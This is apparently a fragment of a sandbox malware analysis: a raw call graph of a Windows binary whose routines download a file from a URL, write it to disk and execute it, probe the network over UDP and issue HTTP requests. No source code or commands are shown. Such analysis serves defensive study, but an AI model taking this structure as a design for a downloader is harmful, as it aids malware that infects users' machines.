40c100 3 API calls 4455 40c15e 4454->4455 4456 40c100 3 API calls 4455->4456 4457 40c16e 4456->4457 4458 40c100 3 API calls 4457->4458 4459 407c7e 4458->4459 4460 40d370 4459->4460 4461 409fd0 7 API calls 4460->4461 4462 40d37b 4461->4462 4463 407c88 4462->4463 4464 40d387 InitializeCriticalSection 4462->4464 4465 40b500 InitializeCriticalSection 4463->4465 4464->4463 4470 40b51a 4465->4470 4466 40b549 CreateFileW 4468 40b570 CreateFileMappingW 4466->4468 4469 40b632 4466->4469 4472 40b591 MapViewOfFile 4468->4472 4473 40b628 CloseHandle 4468->4473 5216 40ada0 EnterCriticalSection 4469->5216 4470->4466 5168 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4470->5168 5169 40b0e0 4470->5169 4476 40b5ac GetFileSize 4472->4476 4477 40b61e CloseHandle 4472->4477 4473->4469 4475 40b637 4478 40d3a0 337 API calls 4475->4478 4481 40b5cb 4476->4481 4477->4473 4479 407c92 4478->4479 4484 40d3a0 4479->4484 4480 40b614 UnmapViewOfFile 4480->4477 4481->4480 4483 40b0e0 32 API calls 4481->4483 5219 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4481->5219 4483->4481 4485 40d3b7 EnterCriticalSection 4484->4485 4486 407caa 4484->4486 5244 40d490 4485->5244 4486->4404 4489 40d47b LeaveCriticalSection 4489->4486 4490 40a220 9 API calls 4491 40d3f9 4490->4491 4491->4489 4492 40d40b CreateThread 4491->4492 4492->4489 4493 40d42e 4492->4493 5249 40d140 4492->5249 5256 401f50 GetQueuedCompletionStatus 4492->5256 5263 40b660 4492->5263 5269 40d0f0 4492->5269 5275 40d790 4492->5275 5286 401920 GetTickCount WaitForSingleObject 4492->5286 5309 40d830 4492->5309 4494 40d452 GetCurrentProcess GetCurrentProcess DuplicateHandle 4493->4494 4495 40d474 4493->4495 4494->4495 4495->4489 4497 40d546 InterlockedExchangeAdd 4496->4497 4498 40d629 GetCurrentThread SetThreadPriority 4496->4498 4497->4498 4504 40d560 4497->4504 4498->4411 4499 40d579 EnterCriticalSection 4499->4504 4500 40d5e7 LeaveCriticalSection 4502 40d5fe 4500->4502 4500->4504 4501 40d5c3 WaitForSingleObject 4501->4504 4502->4498 4503 40d61c Sleep 4503->4504 4504->4498 4504->4499 4504->4500 4504->4501 4504->4502 4504->4503 4506 40d65c EnterCriticalSection 4505->4506 4513 407d1d 4505->4513 4509 40d678 4506->4509 4507 40d6a0 LeaveCriticalSection DeleteCriticalSection 4510 40a3f0 __aligned_recalloc_base 3 API calls 4507->4510 4508 40d68b CloseHandle 4508->4509 4509->4507 4509->4508 4511 40d6c6 4510->4511 4512 40a3f0 __aligned_recalloc_base 3 API calls 4511->4512 4512->4513 4513->4388 4517 40c630 4514->4517 4518 40c663 4517->4518 4519 40c64e 4517->4519 4521 407ba6 4518->4521 4523 40c810 4518->4523 4557 40c690 4519->4557 4521->4388 4521->4389 4524 40c839 4523->4524 4525 40c8ea 4523->4525 4556 40c8e2 4524->4556 4583 409fd0 4524->4583 4528 409fd0 7 API calls 4525->4528 4525->4556 4529 40c90e 4528->4529 4532 402420 7 API calls 4529->4532 4529->4556 4534 40c932 4532->4534 4533 409fd0 7 API calls 4535 40c882 4533->4535 4536 409fd0 7 API calls 4534->4536 4591 4024e0 4535->4591 4538 40c941 4536->4538 4540 4024e0 10 API calls 4538->4540 4539 40c8ab 4594 40a3f0 4539->4594 4542 40c96a 4540->4542 4544 40a3f0 __aligned_recalloc_base 3 API calls 4542->4544 4545 40c976 4544->4545 4547 402420 7 API calls 4545->4547 4546 402420 7 API calls 4548 40c8c8 4546->4548 4550 40c987 4547->4550 4549 4024e0 10 API calls 4548->4549 4549->4556 4551 4024e0 10 API calls 4550->4551 4552 40c9a1 4551->4552 4553 402420 7 API calls 4552->4553 4554 40c9b2 4553->4554 4555 4024e0 10 API calls 4554->4555 4555->4556 4556->4521 4558 40c742 4557->4558 4559 40c6b9 4557->4559 4561 409fd0 7 API calls 4558->4561 4582 40c73a 4558->4582 4560 409fd0 7 API calls 4559->4560 4559->4582 4562 40c6cc 4560->4562 4563 40c768 4561->4563 4564 402420 7 API calls 4562->4564 4562->4582 4565 402420 7 API calls 4563->4565 4563->4582 4566 40c6f5 4564->4566 4567 40c795 4565->4567 4568 4024e0 10 API calls 4566->4568 4569 4024e0 10 API calls 4567->4569 4570 40c70f 4568->4570 4571 40c7af 4569->4571 4572 402420 7 API calls 4570->4572 4573 402420 7 API calls 4571->4573 4574 40c720 4572->4574 4575 40c7c0 4573->4575 4576 4024e0 10 API calls 4574->4576 4577 4024e0 10 API calls 4575->4577 4576->4582 4578 40c7da 4577->4578 4579 402420 7 API calls 4578->4579 4580 40c7eb 4579->4580 4581 4024e0 10 API calls 4580->4581 4581->4582 4582->4521 4601 409ff0 4583->4601 4586 402420 4622 40a1e0 4586->4622 4629 402540 4591->4629 4593 4024ff __aligned_recalloc_base 4593->4539 4639 40a090 GetCurrentProcessId 4594->4639 4596 40a3fb 4597 40a402 4596->4597 4640 40a330 4596->4640 4597->4546 4600 40a417 HeapFree 4600->4597 4610 40a090 GetCurrentProcessId 4601->4610 4603 409ffb 4604 40a007 _invalid_parameter 4603->4604 4611 40a0b0 4603->4611 4606 409fde 4604->4606 4607 40a022 RtlAllocateHeap 4604->4607 4606->4556 4606->4586 4607->4606 4608 40a049 _invalid_parameter 4607->4608 4608->4606 4609 40a064 memset 4608->4609 4609->4606 4610->4603 4619 40a090 GetCurrentProcessId 4611->4619 4613 40a0b9 4614 40a0d6 HeapCreate 4613->4614 4620 40a120 GetProcessHeaps 4613->4620 4616 40a0f0 HeapSetInformation GetCurrentProcessId 4614->4616 4617 40a117 4614->4617 4616->4617 4617->4604 4619->4613 4621 40a0cc 4620->4621 4621->4614 4621->4617 4623 409ff0 _invalid_parameter 7 API calls 4622->4623 4624 40242b 4623->4624 4625 402820 4624->4625 4626 40282a 4625->4626 4627 40a1e0 _invalid_parameter 7 API calls 4626->4627 4628 402438 4627->4628 4628->4533 4630 40258e 4629->4630 4632 402551 4629->4632 4631 40a1e0 _invalid_parameter 7 API calls 4630->4631 4630->4632 4635 4025b2 _invalid_parameter 4631->4635 4632->4593 4633 4025e2 memcpy 4634 402606 _invalid_parameter 4633->4634 4637 40a3f0 __aligned_recalloc_base 3 API calls 4634->4637 4635->4633 4636 40a3f0 __aligned_recalloc_base 3 API calls 4635->4636 4638 4025df 4636->4638 4637->4632 4638->4633 4639->4596 4641 40a360 HeapValidate 4640->4641 4642 40a380 4640->4642 4641->4642 4642->4597 4642->4600 4660 40a460 4643->4660 4646 40caa1 4646->4427 4649 40a3f0 __aligned_recalloc_base 3 API calls 4649->4646 4873 40a220 4650->4873 4653 405cca memcpy 4654 40a460 8 API calls 4653->4654 4655 405d01 4654->4655 4883 40c3d0 4655->4883 4658 405d88 4658->4427 4661 40a48d 4660->4661 4662 40a1e0 _invalid_parameter 7 API calls 4661->4662 4663 40a4a2 4661->4663 4664 40a4a4 memcpy 4661->4664 4662->4661 4663->4646 4665 40bf70 4663->4665 4664->4661 4667 40bf7a 4665->4667 4669 40bfb1 memcmp 4667->4669 4670 40bfd8 4667->4670 4671 40a3f0 __aligned_recalloc_base 3 API calls 4667->4671 4673 40bf99 4667->4673 4674 40c460 4667->4674 4688 407d30 4667->4688 4669->4667 4672 40a3f0 __aligned_recalloc_base 3 API calls 4670->4672 4671->4667 4672->4673 4673->4646 4673->4649 4676 40c46f _invalid_parameter 4674->4676 4675 40c479 4675->4667 4676->4675 4677 40a1e0 _invalid_parameter 7 API calls 4676->4677 4678 40c508 4677->4678 4678->4675 4679 402420 7 API calls 4678->4679 4680 40c51d 4679->4680 4681 402420 7 API calls 4680->4681 4682 40c525 4681->4682 4684 40c57d _invalid_parameter 4682->4684 4691 40c5d0 4682->4691 4696 402470 4684->4696 4687 402470 3 API calls 4687->4675 4804 409f50 4688->4804 4692 4024e0 10 API calls 4691->4692 4693 40c5e4 4692->4693 4702 4026f0 4693->4702 4695 40c5fc 4695->4682 4698 402484 _invalid_parameter 4696->4698 4699 4024ce 4696->4699 4697 40a3f0 __aligned_recalloc_base 3 API calls 4697->4699 4700 40a3f0 __aligned_recalloc_base 3 API calls 4698->4700 4701 4024ac 4698->4701 4699->4687 4700->4701 4701->4697 4705 402710 4702->4705 4704 40270a 4704->4695 4706 402724 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40276d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40277d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40278d 4711->4712 4713 402540 __aligned_recalloc_base 10 API calls 4712->4713 4714 40279d 4713->4714 4715 4027a6 4714->4715 4716 4027cf 4714->4716 4720 403e20 4715->4720 4737 403df0 4716->4737 4719 4027c7 __aligned_recalloc_base 4719->4704 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e37 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e46 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4726 403e55 4725->4726 4727 402820 _invalid_parameter 7 API calls 4726->4727 4736 403e64 _invalid_parameter __aligned_recalloc_base 4727->4736 4729 40400f _invalid_parameter 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 404035 _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 40405b _invalid_parameter 4731->4733 4732->4731 4734 402850 _invalid_parameter 3 API calls 4733->4734 4735 404081 4733->4735 4734->4733 4735->4719 4736->4729 4740 402850 4736->4740 4744 404090 4737->4744 4739 403e0c 4739->4719 4741 402866 4740->4741 4742 40285b 4740->4742 4741->4736 4743 40a3f0 __aligned_recalloc_base 3 API calls 4742->4743 4743->4741 4745 4040a6 _invalid_parameter 4744->4745 4746 4040b8 _invalid_parameter 4745->4746 4747 4040dd 4745->4747 4749 404103 4745->4749 4746->4739 4774 403ca0 4747->4774 4750 40413d 4749->4750 4751 40415e 4749->4751 4784 404680 4750->4784 4753 402820 _invalid_parameter 7 API calls 4751->4753 4754 40416f 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40417e 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40418d 4757->4758 4759 402820 _invalid_parameter 7 API calls 4758->4759 4760 40419c 4759->4760 4797 403d70 4760->4797 4762 402820 _invalid_parameter 7 API calls 4763 4041ca _invalid_parameter 4762->4763 4763->4762 4764 404284 _invalid_parameter __aligned_recalloc_base 4763->4764 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045a3 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045c9 _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 4045ef _invalid_parameter 4768->4770 4769->4768 4771 402850 _invalid_parameter 3 API calls 4770->4771 4772 404615 _invalid_parameter 4770->4772 4771->4770 4772->4746 4773 402850 _invalid_parameter 3 API calls 4772->4773 4773->4772 4775 403cae 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403ccb 4776->4777 4778 402820 _invalid_parameter 7 API calls 4777->4778 4779 403cda _invalid_parameter 4778->4779 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d3a _invalid_parameter 4779->4781 4780->4779 4782 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4781->4782 4783 403d60 4781->4783 4782->4781 4783->4746 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 404697 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 4046a6 4787->4788 4789 402820 _invalid_parameter 7 API calls 4788->4789 4790 4046b5 _invalid_parameter __aligned_recalloc_base 4789->4790 4791 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4790->4791 4792 404841 _invalid_parameter 4790->4792 4791->4790 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 404867 _invalid_parameter 4792->4794 4793->4792 4795 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4794->4795 4796 40488d 4794->4796 4795->4794 4796->4746 4798 402820 _invalid_parameter 7 API calls 4797->4798 4799 403d7f _invalid_parameter 4798->4799 4800 403ca0 _invalid_parameter 9 API calls 4799->4800 4801 403db8 _invalid_parameter 4800->4801 4802 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4801->4802 4803 403de3 4801->4803 4802->4801 4803->4763 4805 409f62 4804->4805 4808 409eb0 4805->4808 4809 40a1e0 _invalid_parameter 7 API calls 4808->4809 4814 409ec0 4809->4814 4810 407d4f 4810->4667 4812 409efc 4815 40a3f0 __aligned_recalloc_base 3 API calls 4812->4815 4814->4810 4814->4812 4817 4093e0 4814->4817 4824 4099d0 4814->4824 4829 409da0 4814->4829 4815->4810 4818 4093f3 4817->4818 4823 4093e9 4817->4823 4819 409436 memset 4818->4819 4818->4823 4820 409457 4819->4820 4819->4823 4821 40945d memcpy 4820->4821 4820->4823 4837 4091b0 4821->4837 4823->4814 4825 4099dd 4824->4825 4826 4099e7 4824->4826 4825->4814 4826->4825 4827 409adf memcpy 4826->4827 4842 409700 4826->4842 4827->4826 4832 409db6 4829->4832 4835 409dac 4829->4835 4830 409700 64 API calls 4831 409e37 4830->4831 4833 4091b0 6 API calls 4831->4833 4831->4835 4832->4830 4832->4835 4834 409e56 4833->4834 4834->4835 4836 409e6b memcpy 4834->4836 4835->4814 4836->4835 4838 4091fe 4837->4838 4840 4091be 4837->4840 4838->4823 4840->4838 4841 4090f0 6 API calls 4840->4841 4841->4840 4843 409710 4842->4843 4844 40971a 4842->4844 4843->4826 4844->4843 4852 409540 4844->4852 4847 409858 memcpy 4847->4843 4849 409877 memcpy 4850 4099a1 4849->4850 4851 409700 62 API calls 4850->4851 4851->4843 4853 40954d 4852->4853 4854 409557 4852->4854 4853->4843 4853->4847 4853->4849 4854->4853 4855 4095e0 4854->4855 4857 4095e5 4854->4857 4858 4095c8 4854->4858 4863 408ea0 4855->4863 4861 4091b0 6 API calls 4857->4861 4860 4091b0 6 API calls 4858->4860 4860->4855 4861->4855 4862 40968c memset 4862->4853 4864 408eb9 4863->4864 4872 408eaf 4863->4872 4865 408d70 9 API calls 4864->4865 4864->4872 4866 408fb2 4865->4866 4867 40a1e0 _invalid_parameter 7 API calls 4866->4867 4868 409001 4867->4868 4869 408be0 46 API calls 4868->4869 4868->4872 4870 40902e 4869->4870 4871 40a3f0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4870->4871 4871->4872 4872->4853 4872->4862 4892 40a090 GetCurrentProcessId 4873->4892 4875 40a22b 4876 40a0b0 _invalid_parameter 5 API calls 4875->4876 4881 40a237 _invalid_parameter 4875->4881 4876->4881 4877 405cb5 4877->4653 4877->4658 4878 40a330 __aligned_recalloc_base HeapValidate 4878->4881 4879 40a2e0 HeapAlloc 4879->4881 4880 40a2aa HeapReAlloc 4880->4881 4881->4877 4881->4878 4881->4879 4881->4880 4882 40a3f0 __aligned_recalloc_base 3 API calls 4881->4882 4882->4881 4886 40c3db 4883->4886 4884 40a1e0 _invalid_parameter 7 API calls 4884->4886 4885 405d4d 4885->4658 4887 407280 4885->4887 4886->4884 4886->4885 4888 40a1e0 _invalid_parameter 7 API calls 4887->4888 4889 407290 4888->4889 4890 4072d7 4889->4890 4891 40729c memcpy CreateThread CloseHandle 4889->4891 4890->4658 4891->4890 4893 4072e0 4891->4893 4892->4875 4894 407347 4893->4894 4900 4072f1 4893->4900 4895 407345 4894->4895 4896 40ed20 64 API calls 4894->4896 4897 40a3f0 __aligned_recalloc_base 3 API calls 4895->4897 4896->4895 4899 407372 4897->4899 4898 407300 StrChrA 4898->4900 4900->4895 4900->4898 4903 40ed20 9 API calls 4900->4903 4904 40ede3 InternetOpenUrlW 4903->4904 4905 40ef4e InternetCloseHandle Sleep 4903->4905 4906 40ef41 InternetCloseHandle 4904->4906 4907 40ee12 CreateFileW 4904->4907 4908 40ef75 7 API calls 4905->4908 4909 40732f Sleep 4905->4909 4906->4905 4910 40ee41 InternetReadFile 4907->4910 4911 40ef34 CloseHandle 4907->4911 4908->4909 4912 40f004 wsprintfW DeleteFileW Sleep 4908->4912 4909->4900 4913 40ee94 CloseHandle wsprintfW DeleteFileW Sleep 4910->4913 4914 40ee65 4910->4914 4911->4906 4915 40ea00 21 API calls 4912->4915 4932 40ea00 CreateFileW 4913->4932 4914->4913 4916 40ee6e WriteFile 4914->4916 4918 40f044 4915->4918 4916->4910 4920 40f082 DeleteFileW 4918->4920 4921 40f04e Sleep 4918->4921 4920->4909 4924 40ebc0 6 API calls 4921->4924 4922 40ef27 DeleteFileW 4922->4911 4923 40eeeb Sleep 4954 40ebc0 memset memset CreateProcessW 4923->4954 4926 40f065 4924->4926 4926->4909 4929 40f078 ExitProcess 4926->4929 4928 40ef0d 4930 40ef16 ExitProcess 4928->4930 4931 40ef1e 4928->4931 4931->4911 4933 40ea45 CreateFileMappingW 4932->4933 4934 40eb5a 4932->4934 4935 40eb50 CloseHandle 4933->4935 4936 40ea66 MapViewOfFile 4933->4936 4937 40eb60 CreateFileW 4934->4937 4938 40ebb1 4934->4938 4935->4934 4939 40ea85 GetFileSize 4936->4939 4940 40eb46 CloseHandle 4936->4940 4941 40eb82 WriteFile CloseHandle 4937->4941 4942 40eba8 4937->4942 4938->4922 4938->4923 4943 40eaa1 4939->4943 4944 40eb3c UnmapViewOfFile 4939->4944 4940->4935 4941->4942 4945 40a3f0 __aligned_recalloc_base 3 API calls 4942->4945 4960 40ca30 4943->4960 4944->4940 4945->4938 4948 40c3d0 7 API calls 4949 40eaf0 4948->4949 4949->4944 4950 40eb0d memcmp 4949->4950 4950->4944 4951 40eb29 4950->4951 4952 40a3f0 __aligned_recalloc_base 3 API calls 4951->4952 4953 40eb32 4952->4953 4953->4944 4955 40ec31 ShellExecuteW 4954->4955 4956 40ec22 Sleep 4954->4956 4958 40ec66 4955->4958 4959 40ec57 Sleep 4955->4959 4957 40ec68 4956->4957 4957->4928 4957->4931 4958->4957 4959->4957 4961 40c460 10 API calls 4960->4961 4962 40ca54 4961->4962 4962->4944 4962->4948 4964 40d97d htons inet_addr setsockopt 4963->4964 4969 40daae 4963->4969 4965 40acc0 8 API calls 4964->4965 4966 40d9f6 bind lstrlenA sendto ioctlsocket 4965->4966 4972 40da4b 4966->4972 4969->4440 4970 40da72 5020 40ad80 shutdown closesocket 4970->5020 4971 40a220 9 API calls 4971->4972 4972->4970 4972->4971 5011 40dad0 4972->5011 5027 40de00 memset InternetCrackUrlA InternetOpenA 4973->5027 4976 40dcde 4976->4440 4978 40a3f0 __aligned_recalloc_base 3 API calls 4978->4976 4979 40dcab 4979->4978 4985 40dca1 SysFreeString 4985->4979 5134 40ac80 inet_addr 4988->5134 4991 40ad1c connect 4992 40ad30 getsockname 4991->4992 4993 40ad64 4991->4993 4992->4993 5137 40ad80 shutdown closesocket 4993->5137 4995 40ad6d 4996 40e6b0 4995->4996 5138 40ac60 inet_ntoa 4996->5138 4998 40e6c6 4999 40cc30 11 API calls 4998->4999 5000 40e6e5 4999->5000 5006 40d90c 5000->5006 5139 40e730 memset InternetCrackUrlA InternetOpenA 5000->5139 5003 40e71c 5005 40a3f0 __aligned_recalloc_base 3 API calls 5003->5005 5004 40a3f0 __aligned_recalloc_base 3 API calls 5004->5003 5005->5006 5006->4445 5010 40a514 5007->5010 5008 40a51a 5008->4435 5009 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5009->5010 5010->5008 5010->5009 5017 40daec 5011->5017 5012 40dbb4 5012->4972 5013 40db08 recvfrom 5014 40db36 StrCmpNIA 5013->5014 5015 40db29 Sleep 5013->5015 5016 40db55 StrStrIA 5014->5016 5014->5017 5015->5017 5016->5017 5018 40db76 StrChrA 5016->5018 5017->5012 5017->5013 5021 40cae0 5018->5021 5020->4969 5025 40caeb 5021->5025 5022 40caf1 lstrlenA 5023 40cb04 5022->5023 5022->5025 5023->5017 5024 40a1e0 _invalid_parameter 7 API calls 5024->5025 5025->5022 5025->5023 5025->5024 5026 40cb20 memcpy 5025->5026 5026->5023 5026->5025 5028 40dea1 InternetConnectA 5027->5028 5029 40dbda 5027->5029 5030 40e00a InternetCloseHandle 5028->5030 5031 40deda HttpOpenRequestA 5028->5031 5029->4976 5040 40dcf0 5029->5040 5030->5029 5032 40df10 HttpSendRequestA 5031->5032 5033 40dffd InternetCloseHandle 5031->5033 5034 40dff0 InternetCloseHandle 5032->5034 5036 40df2d 5032->5036 5033->5030 5034->5033 5035 40df4e InternetReadFile 5035->5036 5037 40df7b 5035->5037 5036->5035 5036->5037 5038 40a220 9 API calls 5036->5038 5037->5034 5039 40df96 memcpy 5038->5039 5039->5036 5069 405630 5040->5069 5043 40dbf3 5043->4979 5050 40e660 5043->5050 5044 40dd1a SysAllocString 5045 40dd31 CoCreateInstance 5044->5045 5046 40dde7 5044->5046 5047 40dddd SysFreeString 5045->5047 5049 40dd56 5045->5049 5048 40a3f0 __aligned_recalloc_base 3 API calls 5046->5048 5047->5046 5048->5043 5049->5047 5086 40e1b0 5050->5086 5053 40e030 5091 40e480 5053->5091 5058 40e5e0 6 API calls 5059 40e087 5058->5059 5065 40dc72 5059->5065 5108 40e2a0 5059->5108 5062 40e0bf 5062->5065 5113 40e150 5062->5113 5063 40e2a0 6 API calls 5063->5062 5065->4985 5066 40cc30 5065->5066 5129 40cba0 5066->5129 5074 40563d 5069->5074 5070 405643 lstrlenA 5072 405656 5070->5072 5070->5074 5072->5043 5072->5044 5073 40a1e0 _invalid_parameter 7 API calls 5073->5074 5074->5070 5074->5072 5074->5073 5076 40a3f0 __aligned_recalloc_base 3 API calls 5074->5076 5077 4055d0 5074->5077 5081 405580 5074->5081 5076->5074 5078 4055e7 MultiByteToWideChar 5077->5078 5079 4055da lstrlenA 5077->5079 5080 40560c 5078->5080 5079->5078 5080->5074 5082 40558b 5081->5082 5083 405591 lstrlenA 5082->5083 5084 4055d0 2 API calls 5082->5084 5085 4055c7 5082->5085 5083->5082 5084->5082 5085->5074 5087 40e1d6 5086->5087 5088 40e253 lstrcmpiW 5087->5088 5089 40dc5d 5087->5089 5090 40e26b SysFreeString 5087->5090 5088->5087 5088->5090 5089->4979 5089->5053 5090->5087 5093 40e4a6 5091->5093 5092 40e04b 5092->5065 5103 40e5e0 5092->5103 5093->5092 5094 40e533 lstrcmpiW 5093->5094 5095 40e5b3 SysFreeString 5094->5095 5096 40e546 5094->5096 5095->5092 5097 40e150 2 API calls 5096->5097 5099 40e554 5097->5099 5098 40e5a5 5098->5095 5099->5095 5099->5098 5100 40e583 lstrcmpiW 5099->5100 5101 40e595 5100->5101 5102 40e59b SysFreeString 5100->5102 5101->5102 5102->5098 5104 40e150 2 API calls 5103->5104 5106 40e5fb 5104->5106 5105 40e069 5105->5058 5105->5065 5106->5105 5107 40e480 6 API calls 5106->5107 5107->5105 5109 40e150 2 API calls 5108->5109 5110 40e2bb 5109->5110 5111 40e0a5 5110->5111 5117 40e320 5110->5117 5111->5062 5111->5063 5115 40e176 5113->5115 5114 40e18d 5114->5065 5115->5114 5116 40e1b0 2 API calls 5115->5116 5116->5114 5119 40e346 5117->5119 5118 40e45d 5118->5111 5119->5118 5120 40e3d3 lstrcmpiW 5119->5120 5121 40e453 SysFreeString 5120->5121 5122 40e3e6 5120->5122 5121->5118 5123 40e150 2 API calls 5122->5123 5125 40e3f4 5123->5125 5124 40e445 5124->5121 5125->5121 5125->5124 5126 40e423 lstrcmpiW 5125->5126 5127 40e435 5126->5127 5128 40e43b SysFreeString 5126->5128 5127->5128 5128->5124 5132 40cbad 5129->5132 5130 40cb50 _vscprintf wvsprintfA 5130->5132 5131 40a220 9 API calls 5131->5132 5132->5130 5132->5131 5133 40cbc8 SysFreeString 5132->5133 5133->4985 5135 40ac99 gethostbyname 5134->5135 5136 40acac socket 5134->5136 5135->5136 5136->4991 5136->4995 5137->4995 5138->4998 5140 40e707 5139->5140 5141 40e7d4 InternetConnectA 5139->5141 5140->5003 5140->5004 5142 40e954 InternetCloseHandle 5141->5142 5143 40e80d HttpOpenRequestA 5141->5143 5142->5140 5144 40e843 HttpAddRequestHeadersA HttpSendRequestA 5143->5144 5145 40e947 InternetCloseHandle 5143->5145 5146 40e93a InternetCloseHandle 5144->5146 5149 40e88d 5144->5149 5145->5142 5146->5145 5147 40e8a4 InternetReadFile 5148 40e8d1 5147->5148 5147->5149 5148->5146 5149->5147 5149->5148 5150 40a220 9 API calls 5149->5150 5151 40e8ec memcpy 5150->5151 5151->5149 5158 406fd7 5152->5158 5153 407230 CoCreateInstance 5153->5158 5154 4071ab 5156 4071b4 SysFreeString 5154->5156 5157 406f7b SysFreeString 5154->5157 5155 40a3f0 __aligned_recalloc_base 3 API calls 5155->5154 5156->5157 5157->4448 5158->5153 5159 407126 SysAllocString 5158->5159 5160 406ff2 5158->5160 5159->5158 5159->5160 5160->5154 5160->5155 5162 40c10a 5161->5162 5163 40c10e 5161->5163 5162->4454 5165 40c0c0 CryptAcquireContextW 5163->5165 5166 40c0fb 5165->5166 5167 40c0dd CryptGenRandom CryptReleaseContext 5165->5167 5166->5162 5167->5166 5168->4470 5220 40b010 gethostname 5169->5220 5173 40b10c strcmp 5174 40b121 5173->5174 5200 40b0f9 5173->5200 5224 40ac60 inet_ntoa 5174->5224 5176 40b12f strstr 5177 40b180 5176->5177 5178 40b13f 5176->5178 5225 40ac60 inet_ntoa 5177->5225 5227 40ac60 inet_ntoa 5178->5227 5181 40b14d strstr 5183 40b15d 5181->5183 5181->5200 5182 40b18e strstr 5184 40b19e 5182->5184 5185 40b1df 5182->5185 5228 40ac60 inet_ntoa 5183->5228 5229 40ac60 inet_ntoa 5184->5229 5226 40ac60 inet_ntoa 5185->5226 5189 40b1ed strstr 5192 40b1fd 5189->5192 5193 40b23e EnterCriticalSection 5189->5193 5190 40b16b strstr 5190->5177 5190->5200 5191 40b1ac strstr 5194 40b1bc 5191->5194 5191->5200 5231 40ac60 inet_ntoa 5192->5231 5196 40b256 5193->5196 5230 40ac60 inet_ntoa 5194->5230 5205 40b281 5196->5205 5233 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5196->5233 5198 40b20b strstr 5198->5200 5201 40b21b 5198->5201 5199 40b1ca strstr 5199->5185 5199->5200 5200->4470 5232 40ac60 inet_ntoa 5201->5232 5204 40b37a LeaveCriticalSection 5204->5200 5205->5204 5207 409fd0 7 API calls 5205->5207 5206 40b229 strstr 5206->5193 5206->5200 5208 40b2c5 5207->5208 5208->5204 5234 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5208->5234 5210 40b2e3 5211 40b310 5210->5211 5212 40b306 Sleep 5210->5212 5214 40b335 5210->5214 5213 40a3f0 __aligned_recalloc_base 3 API calls 5211->5213 5212->5210 5213->5214 5214->5204 5235 40adc0 5214->5235 5217 40adc0 14 API calls 5216->5217 5218 40adb3 LeaveCriticalSection 5217->5218 5218->4475 5219->4481 5221 40b037 gethostbyname 5220->5221 5222 40b053 5220->5222 5221->5222 5222->5200 5223 40ac60 inet_ntoa 5222->5223 5223->5173 5224->5176 5225->5182 5226->5189 5227->5181 5228->5190 5229->5191 5230->5199 5231->5198 5232->5206 5233->5205 5234->5210 5236 40add4 5235->5236 5243 40adcf 5235->5243 5237 40a1e0 _invalid_parameter 7 API calls 5236->5237 5238 40ade8 5237->5238 5239 40ae44 CreateFileW 5238->5239 5238->5243 5240 40ae93 InterlockedExchange 5239->5240 5241 40ae67 WriteFile FlushFileBuffers CloseHandle 5239->5241 5242 40a3f0 __aligned_recalloc_base 3 API calls 5240->5242 5241->5240 5242->5243 5243->5204 5247 40d49d 5244->5247 5245 40d3d3 5245->4489 5245->4490 5246 40d4c1 WaitForSingleObject 5246->5247 5248 40d4dc CloseHandle 5246->5248 5247->5245 5247->5246 5248->5247 5316 4021b0 5249->5316 5252 40d182 5253 40d165 WaitForSingleObject 5320 401600 5253->5320 5257 401f92 5256->5257 5262 402008 5256->5262 5258 401f97 WSAGetOverlappedResult 5257->5258 5370 401d60 5257->5370 5258->5257 5260 401fb9 WSAGetLastError 5258->5260 5260->5257 5261 401fd3 GetQueuedCompletionStatus 5261->5257 5261->5262 5264 40b663 WaitForSingleObject 5263->5264 5265 40b691 5264->5265 5266 40b67b InterlockedDecrement 5264->5266 5267 40b68a 5266->5267 5267->5264 5268 40ada0 16 API calls 5267->5268 5268->5267 5272 40d0f4 5269->5272 5271 40d110 WaitForSingleObject 5271->5272 5274 40d135 5271->5274 5272->5271 5272->5274 5405 40b440 EnterCriticalSection 5272->5405 5410 40cd10 InterlockedExchangeAdd 5272->5410 5584 4013b0 5275->5584 5277 40d79d 5278 40d820 5277->5278 5279 40b440 5 API calls 5277->5279 5280 40d7b7 InterlockedExchangeAdd 5277->5280 5281 40d7fb WaitForSingleObject 5277->5281 5283 40b760 17 API calls 5277->5283 5279->5277 5280->5277 5280->5281 5281->5277 5282 40d814 5281->5282 5597 401330 5282->5597 5283->5277 5287 401ac9 5286->5287 5288 40194d WSAWaitForMultipleEvents 5286->5288 5289 4019f0 GetTickCount 5288->5289 5290 40196a WSAEnumNetworkEvents 5288->5290 5291 401a43 GetTickCount 5289->5291 5292 401a05 EnterCriticalSection 5289->5292 5290->5289 5305 401983 5290->5305 5293 401ab5 WaitForSingleObject 5291->5293 5294 401a4e EnterCriticalSection 5291->5294 5295 401a16 5292->5295 5296 401a3a LeaveCriticalSection 5292->5296 5293->5287 5293->5288 5297 401aa1 LeaveCriticalSection 